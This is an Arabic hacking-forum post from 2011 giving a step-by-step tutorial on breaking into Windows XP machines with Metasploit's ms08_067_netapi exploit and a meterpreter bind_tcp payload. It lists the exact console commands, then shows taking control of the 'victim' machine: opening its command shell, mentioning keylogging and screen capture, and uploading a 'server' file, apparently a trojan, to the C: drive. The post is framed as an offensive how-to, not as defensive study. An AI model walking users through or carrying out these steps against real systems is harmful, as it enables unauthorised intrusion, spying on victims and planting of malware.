Đõn't þļáý wïtĥ Μę مشرف الهكر
":., اَلَـرٍٍََئَـــُـأٍٍَسَــه ,.:" عدد المساهمات : 104 الطاقة : 171 تاريخ التسجيل : 21/08/2011 العمر : 35 الموقع : ف بيت الموزه ههههههههههههه
| موضوع: اخترق وزينذوز اكس بى بالميتا اتفرج واتعلم منى الإثنين أكتوبر 10, 2011 10:12 pm | |
| السلام عليكم
كيفكم شباب ان شاء الله بخير
اليوم عملت لكم درس من دروس الـ backtrack4 شرحنا اليوم اختراق ويندوز اكس بي عن طريق ثغره smb/ms08_067_netapi طبعآ الكل عارفيها بس عارفيها بأستخدام اتصال reverse وهذا شغلتها طويله شوي تخلي الاي بي تبعك وتفتح بورت صعبه اتصال عكسي يعني بعد تطوير راح نخليها bind
الفرق بين bind و reverse او الـ reverse اتصال العكسي لازم تفتح بورت وتضع الاي بي الخاص بك مع الاستغلال امال الـ bind هذا مباشره لا تضع الاي بي تبعك ولا هم يحزنون فقط استغل وباشر ولا تفتح بورت واسف جدآ اذا نسيت شي تاني
نبدء الشرح على بركة الله
اول شي مقدمه البورت للثغره 445 الثغره شغاله على انضمه الويندوز من Windows XP SP3 ومافوق ولشرح على نضام باك تراك 4 ومش مهم اذا عندك بلويندوز ميتا سبلويت عادي مايحتاج
ولشرح مصور بلصوره ان شاء الله ينال اعجابكم
الان نذهب لتشغيل ميتا سبلويت الـ
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
بعد تشغيل الميتا نكتب show exploits لاضهاء الثغرات
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
بعد اضهار الثغرات نبحث على هذا الثغره
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
وبعدها ننزل تحت ونكتب use واسم الثغره الي انا عامل عليها بلون الاحمر يصبح هكذا use windows/smb/ms08_067_netapi ونضغط انتر لاستغلالها
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
وبعد مانضغط انتر نكتب الامر show payloads لاضهار البايلو
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
بعد ماتضهر البايلود نبحث على هذا windows/meterpreter/bind_tcp نأخذها كوبي
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
وننزل تحت نكتب الامر set واسم البايلود يصبح هكذا set payload windows/meterpreter/bind_tcp ونضغط انتر
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
بعد ذاك لانتي للخطوه النهائيه بعد مانستغل البايلود نكتب الامر اي بي المستهدف set rhost ونضغط انت
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
بعد مانضغط انتر نكتب الامر exploit لتطبيق الثغره على جهاز المستهدف
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
بعد ماتضغط انتر يتم اختراق الجهاز ويضهر لك الـ meterpreter يعني تم وتقدر تتحكم بحهازه عن طريق الـ meterpreter
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
حلو ! الان خلصنا نشرح بعض الاوامر بعد مايطلع لك الـ meterpreter نكتب الامر help لمشاهده الاوامر الي نقدر نتحكم فيها بجهاز المستهدف
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
وهذا هيه الاوامر كثيره جدآ انا قدر اصور لكم بعض الاوامر منها
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
لان نكتب الامر shall لذهاب الى الدوس الخاص بلضحيه وطبق اوامر الويندوز على راحتك
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
بعد ماتطبق اوامر انت بكيفك وبدك ترجع الى meterpreter لتطبيق اوامر الميتا مثل التجسس على الكيبورد رفع سيرفر تصوير الشاشه نكتب الامر exit ونرجع للـ meterpreter
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
الان بدنا نرفع سيرفر على جهاز الضحيه ! نكتب الامر upload ونكتب مسار الملف الي بدك ترفعه ومسار نزول الملف في جهاز الضحيه الي هوه c:\ لتفادي المشاكل وصعوبه نكتب الامر ابلود ثم نسحب الملف الي بدنا نرفعه الى الميتا ونكتب الامر c:\ للنزول في بارتشن الـ c
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
تم الرفع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
بس احنه الان بدنا نشغل الملف في جهاز الضحيه او التأكد من انو الملف موجود نكتب الامر shall للذهاب الى شاشه الدوس الخاصه بلضحيه
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
ثم نكتب الامر cd.. للرجوع الى ملف الـ WINDOWS وبعد مانكتب الامر cd.. ورجعنا لملف الويندوز ايضآ نكتب مره ثانيه cd.. للرجوع الى ملف الـ c عشان نشغل الملف او نشوف الملف موجود او لاء
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
الان رجعنا الى ملف الـ c الخاص بلضحيه نكتب الامر dir لاضهار الملفات الموجوده بملف الـ c نفس الامر الخاص بنضام اللينوكس الي هوه ls
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
بعد مانكتب الامر dir تضهر لنا الملفات ولدهاليز الي في بارتشن الـ c
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
ها وقت تم الرفع الملف بنجاح مبرووك عليك الاختراق
بالله عليكم ياشباب لاتنسو التقيم ماتكلف معاك دقيقه
روآبط الصوٌر لمٌن لمٌ تظهر لديه
كود:
https://2img.net/r/ihimizer/img6/6324/snap20111001041516001.png [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الاهداء مايو عرزا اليكس اخواتى بحبكم كلكم ارجوكم التقيم علشان تعبت ف الشرح بجد
[ | |
|